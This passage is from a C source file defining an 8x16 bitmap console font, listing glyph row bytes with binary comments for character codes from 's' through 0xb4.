0xdc, /* 11011100 */
0x76, /* 01110110 */
0x66, /* 01100110 */
0x60, /* 01100000 */
0x60, /* 01100000 */
0x60, /* 01100000 */
0xf0, /* 11110000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
/* 115 0x73 's' */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x7c, /* 01111100 */
0xc6, /* 11000110 */
0x60, /* 01100000 */
0x38, /* 00111000 */
0x0c, /* 00001100 */
0xc6, /* 11000110 */
0x7c, /* 01111100 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
/* 116 0x74 't' */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x10, /* 00010000 */
0x30, /* 00110000 */
0x30, /* 00110000 */
0xfc, /* 11111100 */
0x30, /* 00110000 */
0x30, /* 00110000 */
0x30, /* 00110000 */
0x30, /* 00110000 */
0x36, /* 00110110 */
0x1c, /* 00011100 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
/* 117 0x75 'u' */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0xcc, /* 11001100 */
0xcc, /* 11001100 */
0xcc, /* 11001100 */
0xcc, /* 11001100 */
0xcc, /* 11001100 */
0xcc, /* 11001100 */
0x76, /* 01110110 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
/* 118 0x76 'v' */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0xc6, /* 11000110 */
0xc6, /* 11000110 */
0xc6, /* 11000110 */
0xc6, /* 11000110 */
0xc6, /* 11000110 */
0x6c, /* 01101100 */
0x38, /* 00111000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
/* 119 0x77 'w' */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0xc6, /* 11000110 */
0xc6, /* 11000110 */
0xd6, /* 11010110 */
0xd6, /* 11010110 */
0xd6, /* 11010110 */
0xfe, /* 11111110 */
0x6c, /* 01101100 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
/* 120 0x78 'x' */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0xc6, /* 11000110 */
0x6c, /* 01101100 */
0x38, /* 00111000 */
0x38, /* 00111000 */
0x38, /* 00111000 */
0x6c, /* 01101100 */
0xc6, /* 11000110 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
/* 121 0x79 'y' */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0xc6, /* 11000110 */
0xc6, /* 11000110 */
0xc6, /* 11000110 */
0xc6, /* 11000110 */
0xc6, /* 11000110 */
0xc6, /* 11000110 */
0x7e, /* 01111110 */
0x06, /* 00000110 */
0x0c, /* 00001100 */
0xf8, /* 11111000 */
0x00, /* 00000000 */
/* 122 0x7a 'z' */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0xfe, /* 11111110 */
0xcc, /* 11001100 */
0x18, /* 00011000 */
0x30, /* 00110000 */
0x60, /* 01100000 */
0xc6, /* 11000110 */
0xfe, /* 11111110 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
/* 123 0x7b '{' */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x0e, /* 00001110 */
0x18, /* 00011000 */
0x18, /* 00011000 */
0x18, /* 00011000 */
0x70, /* 01110000 */
0x18, /* 00011000 */
0x18, /* 00011000 */
0x18, /* 00011000 */
0x18, /* 00011000 */
0x0e, /* 00001110 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
/* 124 0x7c '|' */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x18, /* 00011000 */
0x18, /* 00011000 */
0x18, /* 00011000 */
0x18, /* 00011000 */
0x18, /* 00011000 */
0x18, /* 00011000 */
0x18, /* 00011000 */
0x18, /* 00011000 */
0x18, /* 00011000 */
0x18, /* 00011000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
/* 125 0x7d '}' */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x70, /* 01110000 */
0x18, /* 00011000 */
0x18, /* 00011000 */
0x18, /* 00011000 */
0x0e, /* 00001110 */
0x18, /* 00011000 */
0x18, /* 00011000 */
0x18, /* 00011000 */
0x18, /* 00011000 */
0x70, /* 01110000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
/* 126 0x7e '~' */
0x00, /* 00000000 */
0x76, /* 01110110 */
0xdc, /* 11011100 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
/* 127 0x7f '' */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x10, /* 00010000 */
0x38, /* 00111000 */
0x6c, /* 01101100 */
0xc6, /* 11000110 */
0xc6, /* 11000110 */
0xc6, /* 11000110 */
0xfe, /* 11111110 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
/* 128 0x80 '€' */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x3c, /* 00111100 */
0x66, /* 01100110 */
0xc2, /* 11000010 */
0xc0, /* 11000000 */
0xc0, /* 11000000 */
0xc0, /* 11000000 */
0xc0, /* 11000000 */
0xc2, /* 11000010 */
0x66, /* 01100110 */
0x3c, /* 00111100 */
0x18, /* 00011000 */
0x70, /* 01110000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
/* 129 0x81 '? */
0x00, /* 00000000 */
0x00, /* 00000000 */
0xcc, /* 11001100 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0xcc, /* 11001100 */
0xcc, /* 11001100 */
0xcc, /* 11001100 */
0xcc, /* 11001100 */
0xcc, /* 11001100 */
0xcc, /* 11001100 */
0x76, /* 01110110 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
/* 130 0x82 '? */
0x00, /* 00000000 */
0x0c, /* 00001100 */
0x18, /* 00011000 */
0x30, /* 00110000 */
0x00, /* 00000000 */
0x7c, /* 01111100 */
0xc6, /* 11000110 */
0xfe, /* 11111110 */
0xc0, /* 11000000 */
0xc0, /* 11000000 */
0xc6, /* 11000110 */
0x7c, /* 01111100 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
/* 131 0x83 '? */
0x00, /* 00000000 */
0x10, /* 00010000 */
0x38, /* 00111000 */
0x6c, /* 01101100 */
0x00, /* 00000000 */
0x78, /* 01111000 */
0x0c, /* 00001100 */
0x7c, /* 01111100 */
0xcc, /* 11001100 */
0xcc, /* 11001100 */
0xcc, /* 11001100 */
0x76, /* 01110110 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
/* 132 0x84 '? */
0x00, /* 00000000 */
0x00, /* 00000000 */
0xcc, /* 11001100 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x78, /* 01111000 */
0x0c, /* 00001100 */
0x7c, /* 01111100 */
0xcc, /* 11001100 */
0xcc, /* 11001100 */
0xcc, /* 11001100 */
0x76, /* 01110110 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
/* 133 0x85 '? */
0x00, /* 00000000 */
0x60, /* 01100000 */
0x30, /* 00110000 */
0x18, /* 00011000 */
0x00, /* 00000000 */
0x78, /* 01111000 */
0x0c, /* 00001100 */
0x7c, /* 01111100 */
0xcc, /* 11001100 */
0xcc, /* 11001100 */
0xcc, /* 11001100 */
0x76, /* 01110110 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
/* 134 0x86 '? */
0x00, /* 00000000 */
0x38, /* 00111000 */
0x6c, /* 01101100 */
0x38, /* 00111000 */
0x00, /* 00000000 */
0x78, /* 01111000 */
0x0c, /* 00001100 */
0x7c, /* 01111100 */
0xcc, /* 11001100 */
0xcc, /* 11001100 */
0xcc, /* 11001100 */
0x76, /* 01110110 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
/* 135 0x87 '? */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x7c, /* 01111100 */
0xc6, /* 11000110 */
0xc0, /* 11000000 */
0xc0, /* 11000000 */
0xc0, /* 11000000 */
0xc6, /* 11000110 */
0x7c, /* 01111100 */
0x18, /* 00011000 */
0x70, /* 01110000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
/* 136 0x88 '? */
0x00, /* 00000000 */
0x10, /* 00010000 */
0x38, /* 00111000 */
0x6c, /* 01101100 */
0x00, /* 00000000 */
0x7c, /* 01111100 */
0xc6, /* 11000110 */
0xfe, /* 11111110 */
0xc0, /* 11000000 */
0xc0, /* 11000000 */
0xc6, /* 11000110 */
0x7c, /* 01111100 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
/* 137 0x89 '? */
0x00, /* 00000000 */
0x00, /* 00000000 */
0xc6, /* 11000110 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x7c, /* 01111100 */
0xc6, /* 11000110 */
0xfe, /* 11111110 */
0xc0, /* 11000000 */
0xc0, /* 11000000 */
0xc6, /* 11000110 */
0x7c, /* 01111100 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
/* 138 0x8a '? */
0x00, /* 00000000 */
0x60, /* 01100000 */
0x30, /* 00110000 */
0x18, /* 00011000 */
0x00, /* 00000000 */
0x7c, /* 01111100 */
0xc6, /* 11000110 */
0xfe, /* 11111110 */
0xc0, /* 11000000 */
0xc0, /* 11000000 */
0xc6, /* 11000110 */
0x7c, /* 01111100 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
/* 139 0x8b '? */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x66, /* 01100110 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x38, /* 00111000 */
0x18, /* 00011000 */
0x18, /* 00011000 */
0x18, /* 00011000 */
0x18, /* 00011000 */
0x18, /* 00011000 */
0x3c, /* 00111100 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
/* 140 0x8c '? */
0x00, /* 00000000 */
0x18, /* 00011000 */
0x3c, /* 00111100 */
0x66, /* 01100110 */
0x00, /* 00000000 */
0x38, /* 00111000 */
0x18, /* 00011000 */
0x18, /* 00011000 */
0x18, /* 00011000 */
0x18, /* 00011000 */
0x18, /* 00011000 */
0x3c, /* 00111100 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
/* 141 0x8d '? */
0x00, /* 00000000 */
0x60, /* 01100000 */
0x30, /* 00110000 */
0x18, /* 00011000 */
0x00, /* 00000000 */
0x38, /* 00111000 */
0x18, /* 00011000 */
0x18, /* 00011000 */
0x18, /* 00011000 */
0x18, /* 00011000 */
0x18, /* 00011000 */
0x3c, /* 00111100 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
/* 142 0x8e '? */
0x00, /* 00000000 */
0xc6, /* 11000110 */
0x00, /* 00000000 */
0x10, /* 00010000 */
0x38, /* 00111000 */
0x6c, /* 01101100 */
0xc6, /* 11000110 */
0xc6, /* 11000110 */
0xfe, /* 11111110 */
0xc6, /* 11000110 */
0xc6, /* 11000110 */
0xc6, /* 11000110 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
/* 143 0x8f '? */
0x38, /* 00111000 */
0x6c, /* 01101100 */
0x38, /* 00111000 */
0x10, /* 00010000 */
0x38, /* 00111000 */
0x6c, /* 01101100 */
0xc6, /* 11000110 */
0xfe, /* 11111110 */
0xc6, /* 11000110 */
0xc6, /* 11000110 */
0xc6, /* 11000110 */
0xc6, /* 11000110 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
/* 144 0x90 '? */
0x0c, /* 00001100 */
0x18, /* 00011000 */
0x00, /* 00000000 */
0xfe, /* 11111110 */
0x66, /* 01100110 */
0x62, /* 01100010 */
0x68, /* 01101000 */
0x78, /* 01111000 */
0x68, /* 01101000 */
0x62, /* 01100010 */
0x66, /* 01100110 */
0xfe, /* 11111110 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
/* 145 0x91 '? */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0xec, /* 11101100 */
0x36, /* 00110110 */
0x36, /* 00110110 */
0x7e, /* 01111110 */
0xd8, /* 11011000 */
0xd8, /* 11011000 */
0x6e, /* 01101110 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
/* 146 0x92 '? */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x3e, /* 00111110 */
0x6c, /* 01101100 */
0xcc, /* 11001100 */
0xcc, /* 11001100 */
0xfe, /* 11111110 */
0xcc, /* 11001100 */
0xcc, /* 11001100 */
0xcc, /* 11001100 */
0xcc, /* 11001100 */
0xce, /* 11001110 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
/* 147 0x93 '? */
0x00, /* 00000000 */
0x10, /* 00010000 */
0x38, /* 00111000 */
0x6c, /* 01101100 */
0x00, /* 00000000 */
0x7c, /* 01111100 */
0xc6, /* 11000110 */
0xc6, /* 11000110 */
0xc6, /* 11000110 */
0xc6, /* 11000110 */
0xc6, /* 11000110 */
0x7c, /* 01111100 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
/* 148 0x94 '? */
0x00, /* 00000000 */
0x00, /* 00000000 */
0xc6, /* 11000110 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x7c, /* 01111100 */
0xc6, /* 11000110 */
0xc6, /* 11000110 */
0xc6, /* 11000110 */
0xc6, /* 11000110 */
0xc6, /* 11000110 */
0x7c, /* 01111100 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
/* 149 0x95 '? */
0x00, /* 00000000 */
0x60, /* 01100000 */
0x30, /* 00110000 */
0x18, /* 00011000 */
0x00, /* 00000000 */
0x7c, /* 01111100 */
0xc6, /* 11000110 */
0xc6, /* 11000110 */
0xc6, /* 11000110 */
0xc6, /* 11000110 */
0xc6, /* 11000110 */
0x7c, /* 01111100 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
/* 150 0x96 '? */
0x00, /* 00000000 */
0x30, /* 00110000 */
0x78, /* 01111000 */
0xcc, /* 11001100 */
0x00, /* 00000000 */
0xcc, /* 11001100 */
0xcc, /* 11001100 */
0xcc, /* 11001100 */
0xcc, /* 11001100 */
0xcc, /* 11001100 */
0xcc, /* 11001100 */
0x76, /* 01110110 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
/* 151 0x97 '? */
0x00, /* 00000000 */
0x60, /* 01100000 */
0x30, /* 00110000 */
0x18, /* 00011000 */
0x00, /* 00000000 */
0xcc, /* 11001100 */
0xcc, /* 11001100 */
0xcc, /* 11001100 */
0xcc, /* 11001100 */
0xcc, /* 11001100 */
0xcc, /* 11001100 */
0x76, /* 01110110 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
/* 152 0x98 '? */
0x00, /* 00000000 */
0x00, /* 00000000 */
0xc6, /* 11000110 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0xc6, /* 11000110 */
0xc6, /* 11000110 */
0xc6, /* 11000110 */
0xc6, /* 11000110 */
0xc6, /* 11000110 */
0xc6, /* 11000110 */
0x7e, /* 01111110 */
0x06, /* 00000110 */
0x0c, /* 00001100 */
0x78, /* 01111000 */
0x00, /* 00000000 */
/* 153 0x99 '? */
0x00, /* 00000000 */
0xc6, /* 11000110 */
0x00, /* 00000000 */
0x7c, /* 01111100 */
0xc6, /* 11000110 */
0xc6, /* 11000110 */
0xc6, /* 11000110 */
0xc6, /* 11000110 */
0xc6, /* 11000110 */
0xc6, /* 11000110 */
0xc6, /* 11000110 */
0x7c, /* 01111100 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
/* 154 0x9a '? */
0x00, /* 00000000 */
0xc6, /* 11000110 */
0x00, /* 00000000 */
0xc6, /* 11000110 */
0xc6, /* 11000110 */
0xc6, /* 11000110 */
0xc6, /* 11000110 */
0xc6, /* 11000110 */
0xc6, /* 11000110 */
0xc6, /* 11000110 */
0xc6, /* 11000110 */
0x7c, /* 01111100 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
/* 155 0x9b '? */
0x00, /* 00000000 */
0x18, /* 00011000 */
0x18, /* 00011000 */
0x7c, /* 01111100 */
0xc6, /* 11000110 */
0xc0, /* 11000000 */
0xc0, /* 11000000 */
0xc0, /* 11000000 */
0xc6, /* 11000110 */
0x7c, /* 01111100 */
0x18, /* 00011000 */
0x18, /* 00011000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
/* 156 0x9c '? */
0x00, /* 00000000 */
0x38, /* 00111000 */
0x6c, /* 01101100 */
0x64, /* 01100100 */
0x60, /* 01100000 */
0xf0, /* 11110000 */
0x60, /* 01100000 */
0x60, /* 01100000 */
0x60, /* 01100000 */
0x60, /* 01100000 */
0xe6, /* 11100110 */
0xfc, /* 11111100 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
/* 157 0x9d '? */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x66, /* 01100110 */
0x66, /* 01100110 */
0x3c, /* 00111100 */
0x18, /* 00011000 */
0x7e, /* 01111110 */
0x18, /* 00011000 */
0x7e, /* 01111110 */
0x18, /* 00011000 */
0x18, /* 00011000 */
0x18, /* 00011000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
/* 158 0x9e '? */
0x00, /* 00000000 */
0xf8, /* 11111000 */
0xcc, /* 11001100 */
0xcc, /* 11001100 */
0xf8, /* 11111000 */
0xc4, /* 11000100 */
0xcc, /* 11001100 */
0xde, /* 11011110 */
0xcc, /* 11001100 */
0xcc, /* 11001100 */
0xcc, /* 11001100 */
0xc6, /* 11000110 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
/* 159 0x9f '? */
0x00, /* 00000000 */
0x0e, /* 00001110 */
0x1b, /* 00011011 */
0x18, /* 00011000 */
0x18, /* 00011000 */
0x18, /* 00011000 */
0x7e, /* 01111110 */
0x18, /* 00011000 */
0x18, /* 00011000 */
0x18, /* 00011000 */
0xd8, /* 11011000 */
0x70, /* 01110000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
/* 160 0xa0 '? */
0x00, /* 00000000 */
0x18, /* 00011000 */
0x30, /* 00110000 */
0x60, /* 01100000 */
0x00, /* 00000000 */
0x78, /* 01111000 */
0x0c, /* 00001100 */
0x7c, /* 01111100 */
0xcc, /* 11001100 */
0xcc, /* 11001100 */
0xcc, /* 11001100 */
0x76, /* 01110110 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
/* 161 0xa1 '? */
0x00, /* 00000000 */
0x0c, /* 00001100 */
0x18, /* 00011000 */
0x30, /* 00110000 */
0x00, /* 00000000 */
0x38, /* 00111000 */
0x18, /* 00011000 */
0x18, /* 00011000 */
0x18, /* 00011000 */
0x18, /* 00011000 */
0x18, /* 00011000 */
0x3c, /* 00111100 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
/* 162 0xa2 '? */
0x00, /* 00000000 */
0x18, /* 00011000 */
0x30, /* 00110000 */
0x60, /* 01100000 */
0x00, /* 00000000 */
0x7c, /* 01111100 */
0xc6, /* 11000110 */
0xc6, /* 11000110 */
0xc6, /* 11000110 */
0xc6, /* 11000110 */
0xc6, /* 11000110 */
0x7c, /* 01111100 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
/* 163 0xa3 '? */
0x00, /* 00000000 */
0x18, /* 00011000 */
0x30, /* 00110000 */
0x60, /* 01100000 */
0x00, /* 00000000 */
0xcc, /* 11001100 */
0xcc, /* 11001100 */
0xcc, /* 11001100 */
0xcc, /* 11001100 */
0xcc, /* 11001100 */
0xcc, /* 11001100 */
0x76, /* 01110110 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
/* 164 0xa4 '? */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x76, /* 01110110 */
0xdc, /* 11011100 */
0x00, /* 00000000 */
0xdc, /* 11011100 */
0x66, /* 01100110 */
0x66, /* 01100110 */
0x66, /* 01100110 */
0x66, /* 01100110 */
0x66, /* 01100110 */
0x66, /* 01100110 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
/* 165 0xa5 '? */
0x76, /* 01110110 */
0xdc, /* 11011100 */
0x00, /* 00000000 */
0xc6, /* 11000110 */
0xe6, /* 11100110 */
0xf6, /* 11110110 */
0xfe, /* 11111110 */
0xde, /* 11011110 */
0xce, /* 11001110 */
0xc6, /* 11000110 */
0xc6, /* 11000110 */
0xc6, /* 11000110 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
/* 166 0xa6 '? */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x3c, /* 00111100 */
0x6c, /* 01101100 */
0x6c, /* 01101100 */
0x3e, /* 00111110 */
0x00, /* 00000000 */
0x7e, /* 01111110 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
/* 167 0xa7 '? */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x38, /* 00111000 */
0x6c, /* 01101100 */
0x6c, /* 01101100 */
0x38, /* 00111000 */
0x00, /* 00000000 */
0x7c, /* 01111100 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
/* 168 0xa8 '? */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x30, /* 00110000 */
0x30, /* 00110000 */
0x00, /* 00000000 */
0x30, /* 00110000 */
0x30, /* 00110000 */
0x60, /* 01100000 */
0xc0, /* 11000000 */
0xc6, /* 11000110 */
0xc6, /* 11000110 */
0x7c, /* 01111100 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
/* 169 0xa9 '? */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0xfe, /* 11111110 */
0xc0, /* 11000000 */
0xc0, /* 11000000 */
0xc0, /* 11000000 */
0xc0, /* 11000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
/* 170 0xaa '? */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0xfe, /* 11111110 */
0x06, /* 00000110 */
0x06, /* 00000110 */
0x06, /* 00000110 */
0x06, /* 00000110 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
/* 171 0xab '? */
0x00, /* 00000000 */
0x60, /* 01100000 */
0xe0, /* 11100000 */
0x62, /* 01100010 */
0x66, /* 01100110 */
0x6c, /* 01101100 */
0x18, /* 00011000 */
0x30, /* 00110000 */
0x60, /* 01100000 */
0xdc, /* 11011100 */
0x86, /* 10000110 */
0x0c, /* 00001100 */
0x18, /* 00011000 */
0x3e, /* 00111110 */
0x00, /* 00000000 */
0x00, /* 00000000 */
/* 172 0xac '? */
0x00, /* 00000000 */
0x60, /* 01100000 */
0xe0, /* 11100000 */
0x62, /* 01100010 */
0x66, /* 01100110 */
0x6c, /* 01101100 */
0x18, /* 00011000 */
0x30, /* 00110000 */
0x66, /* 01100110 */
0xce, /* 11001110 */
0x9a, /* 10011010 */
0x3f, /* 00111111 */
0x06, /* 00000110 */
0x06, /* 00000110 */
0x00, /* 00000000 */
0x00, /* 00000000 */
/* 173 0xad '? */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x18, /* 00011000 */
0x18, /* 00011000 */
0x00, /* 00000000 */
0x18, /* 00011000 */
0x18, /* 00011000 */
0x18, /* 00011000 */
0x3c, /* 00111100 */
0x3c, /* 00111100 */
0x3c, /* 00111100 */
0x18, /* 00011000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
/* 174 0xae '? */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x36, /* 00110110 */
0x6c, /* 01101100 */
0xd8, /* 11011000 */
0x6c, /* 01101100 */
0x36, /* 00110110 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
/* 175 0xaf '? */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0xd8, /* 11011000 */
0x6c, /* 01101100 */
0x36, /* 00110110 */
0x6c, /* 01101100 */
0xd8, /* 11011000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
/* 176 0xb0 '? */
0x11, /* 00010001 */
0x44, /* 01000100 */
0x11, /* 00010001 */
0x44, /* 01000100 */
0x11, /* 00010001 */
0x44, /* 01000100 */
0x11, /* 00010001 */
0x44, /* 01000100 */
0x11, /* 00010001 */
0x44, /* 01000100 */
0x11, /* 00010001 */
0x44, /* 01000100 */
0x11, /* 00010001 */
0x44, /* 01000100 */
0x11, /* 00010001 */
0x44, /* 01000100 */
/* 177 0xb1 '? */
0x55, /* 01010101 */
0xaa, /* 10101010 */
0x55, /* 01010101 */
0xaa, /* 10101010 */
0x55, /* 01010101 */
0xaa, /* 10101010 */
0x55, /* 01010101 */
0xaa, /* 10101010 */
0x55, /* 01010101 */
0xaa, /* 10101010 */
0x55, /* 01010101 */
0xaa, /* 10101010 */
0x55, /* 01010101 */
0xaa, /* 10101010 */
0x55, /* 01010101 */
0xaa, /* 10101010 */
/* 178 0xb2 '? */
0xdd, /* 11011101 */
0x77, /* 01110111 */
0xdd, /* 11011101 */
0x77, /* 01110111 */
0xdd, /* 11011101 */
0x77, /* 01110111 */
0xdd, /* 11011101 */
0x77, /* 01110111 */
0xdd, /* 11011101 */
0x77, /* 01110111 */
0xdd, /* 11011101 */
0x77, /* 01110111 */
0xdd, /* 11011101 */
0x77, /* 01110111 */
0xdd, /* 11011101 */
0x77, /* 01110111 */
/* 179 0xb3 '? */
0x18, /* 00011000 */
0x18, /* 00011000 */
0x18, /* 00011000 */
0x18, /* 00011000 */
0x18, /* 00011000 */
0x18, /* 00011000 */
0x18, /* 00011000 */
0x18, /* 00011000 */
0x18, /* 00011000 */
0x18, /* 00011000 */
0x18, /* 00011000 */
0x18, /* 00011000 */
0x18, /* 00011000 */
0x18, /* 00011000 */
0x18, /* 00011000 */
0x18, /* 00011000 */
/* 180 0xb4 '? */
0x18, /* 00011000 */
0x18, /* 00011000 */
0x18, /* 00011000 */
0x18, /* 00011000 */
0x18, /* 00011000 */
0x18, /* 00011000 */
0x18, /* 00011000 */
0xf8, /* 11111000 */
